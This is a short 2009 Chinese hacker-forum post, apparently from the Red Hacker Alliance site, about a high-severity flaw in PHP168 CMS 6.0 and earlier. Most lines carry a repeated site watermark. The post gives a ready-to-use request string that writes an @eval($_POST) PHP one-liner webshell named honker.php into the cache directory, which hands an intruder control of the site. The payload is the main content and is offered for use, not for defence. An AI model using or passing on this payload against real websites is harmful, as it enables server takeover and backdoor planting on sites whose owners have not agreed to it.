PHP168 6.0及以下版本漏洞
发表时间:2009-09-07 23:43:31 作者:Amxking 来源:红客联盟 收藏本页

tcT中国红客联盟-全球最大的红客组织
tcT中国红客联盟-全球最大的红客组织
tcT中国红客联盟-全球最大的红客组织
危险等级:高 tcT中国红客联盟-全球最大的红客组织
tcT中国红客联盟-全球最大的红客组织
影响版本:PHP168 6.0以下版本  tcT中国红客联盟-全球最大的红客组织
tcT中国红客联盟-全球最大的红客组织
tcT中国红客联盟-全球最大的红客组织
tcT中国红客联盟-全球最大的红客组织
入侵者可以在用户登陆页面构造特殊语句,将PHP一句话写入cache目录,从而获得使用PHP168整站程序网站的WEBSHELL权限。  tcT中国红客联盟-全球最大的红客组织
tcT中国红客联盟-全球最大的红客组织
tcT中国红客联盟-全球最大的红客组织
tcT中国红客联盟-全球最大的红客组织
测试语句: tcT中国红客联盟-全球最大的红客组织
tcT中国红客联盟-全球最大的红客组织
tcT中国红客联盟-全球最大的红客组织
tcT中国红客联盟-全球最大的红客组织
     ?makehtml=1&chdb[htmlname]=honker.php&chdb[path]=cache&content=?php%20@eval($_POST[honker]);?tcT中国红客联盟-全球最大的红客组织

tcT中国红客联盟-全球最大的红客组织
tcT中国红客联盟-全球最大的红客组织

豫ICP备09015648号版权所有© 2001-2009中国红客联盟 All Rights Reserved.